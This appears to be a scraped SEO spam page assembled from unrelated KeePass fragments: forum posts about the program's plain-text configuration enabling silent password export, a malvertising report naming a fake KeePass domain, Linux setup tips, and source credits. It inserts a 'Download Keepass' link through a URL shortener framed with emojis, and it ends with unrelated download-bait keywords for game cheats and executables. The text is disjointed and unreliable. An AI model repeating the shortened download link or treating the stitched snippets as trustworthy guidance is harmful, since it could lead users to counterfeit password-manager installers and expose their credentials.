Hey all. So, a couple minutes ago I was on a discord channel (on the webapp). I had previously copied my keepass database from one location to another folder on my computer. The issue is that the db was still in my clipboard and I accidentally pasted it into the discord chat input. I didn't actually send the message, but I'm wondering if this action alone uploaded the db into discord servers. If so, I would be quite worried since I know discord is known to be a bit of a privacy nightmare. Do you think I should be worried about this? I'm wondering if i should go ahead and change all my passwords now, or at least the most important ones.

If passphrase is *randomly* chosen using dice, and with enough words, say eight words, it has high entropy and very difficult for an attacker to brute force. So it makes sense to use such an approach for securing password vault such as keepass or bitwarden.


Download Keepass


Download 🔥 https://urlin.us/2y2Efw 🔥



BUT : Whether I use a dice or use keepass' built in passphrase generator after wiggling the mouse sufficiently, I dont agree that I should accept the first passphrase I get. Surely if get a phrase such as "correct horse battery staple correct horse battery staple" I would reject that. Wouldnt you ?

Thank you Dominik,

But I'm not talking about a virus : a notepad is enough with access to the configuration file (for example by gaining remote access to the file). 

As a keepass user I was not fooled since silent export is a standard feature of keepass. 

If a password manager is as secure as a plain text configuration file, why should I use it instead of a spreadsheet to store my passwords on my computer ?

Forcing the use of 'require entering current master key before exporting' could be great

Best regards

wellread1, I have read the documentation about enforced configuration file, but by default configuration file is a plain text file : by default keepass exe is insecure.

Paul, You should say The database is as secure as Notepad

Why do you use keepass?

I chose to encrypt my passwords with keepass so that they are easier to manage, and not readable by everyone.

I don't use it so that an attacker can easily access all my passwords, at once, using notepad

There is a mistake on the keepass homepage (for windows application) because it says : "which helps you to manage your passwords in a secure way", "Database files are encrypted using the best and most secure encryption algorithms currently known"

This point is missing: "someone can ask to export all your passwords in clear text without you knowing it"

You propose a workaround.

Why people trust keepass so they use it instead of a spreadsheet ? perhaps because it is supposed to provide additional security, simply by clicking on the 'install' button.

And how many know that by default a simple text editor will configure keepass to export, the next time they open it, all passwords in clear text without notification or confirmation?

The keepass application security layer seems too light and the risk is very important : keepass allows to discover silently ALL the user's passwords

To bypass keepass security layer : no need for a virus or any special skills the windows notepad application with keepass documentation are enough

In a sensitive application, the password is requested before an impacting modification action.

For example in windows : when changing the password, or when entering the admin account before a system modification.

"Open databases get some protection against generic attacks." I gave a counter-example for keepass, open it and perhaps someone has exported its content.

A chain is as strong as its weakest link

Why do you ignore my request to add a confirmation before exporting all passwords in clear text as done with export trigger ? (saying there is an optional disable option is not very secure)

First of all, as you can see, I am looking for ways to improve the security of keepass and I thank you for answering my questions.

'Ignore' is not the right word, you avoid. I suggest that the consequences of changing the configuration file are significant and can be improved

I have the same issue when I make a remote desktop connection from my laptop with one screen to my desktop with two (where keepass is running). My findings concerning the config.xml location, write-ability, and behavior all match Grindax's.

is keepassdroid use same code as keepass ?

otherwise instead of logical intrusion , for my personal usage of my computers I consider that another risk is if my remote laptop is stolen.

instead of disk encryption, if pagefile.sys is deleted at each pc shutdown and hibernate funcion is not used risk is convered.

what is your opinion about that ?

However, if I select a credential and click 'properties' I can edit the fields -- username, password etc. There is no 'save' button though, just 'close', and any changes I make are not persisted either in keepass or royal ts.

People who click on the ad will be redirected via a cloaking service that is meant to filter sandboxes, bots and anyone not deemed to be a genuine victim. The threat actors have set up a temporary domain at keepasstacking[.]site that performs the conditional redirect to the final destination:

In such case you use the autotype functionality of keepass. Therefore you must enable additional information in the window title of SAPGUI (>7.30 needed). You do so in SAPGUI->options->visualization 2.

Good works, I have a problem with keepass, now my system enable SSO by default, but I need logon with many users everytime for test purpose, when I click item in keepass that specific username and password, but every time, I logon with own user because of SSO, So I want to know whether is there a parameter to make SSO disable in keepass?

To enable the autotype feature on Wayland, edit /usr/share/applications/org.keepassxc.KeePassXC.desktop and change the value of Exec to keepassxc -platform xcb. Alternatively, set the QT_QPA_PLATFORM=xcb environment variable before launching KeePassXC. However, native Wayland applications will not work with autotype. For example, autotype works when running Firefox without Wayland, but not with.

To enable the dark theme for KeePass, install keepass-keethemeAUR. After installation, the plugin will get compiled upon starting KeePass. It can then be activated via Tools > Dark Theme, or by pressing Ctrl+t.

Knowledge about the algorithms necessary to decode a KeePass DB v1 format was gleaned from the source code of keepassx-0.4.3. That source code is published under the GPL2 license. KeePassX 0.4.3 bears the copyright of

Knowledge about the algorithms necessary to decode a KeePass DB v2 format was gleaned from the source code of keepassx-2.0-alpha1. That source code is published under the GPL2 or GPL3 license. KeePassX 2.0-alpha1 bears the copyright of ff782bc1db

world war z 2019 game download

download dragon mania legends cheat

real steel 2 movie download

download jelly go for pc

hp eprint app setup x64.exe download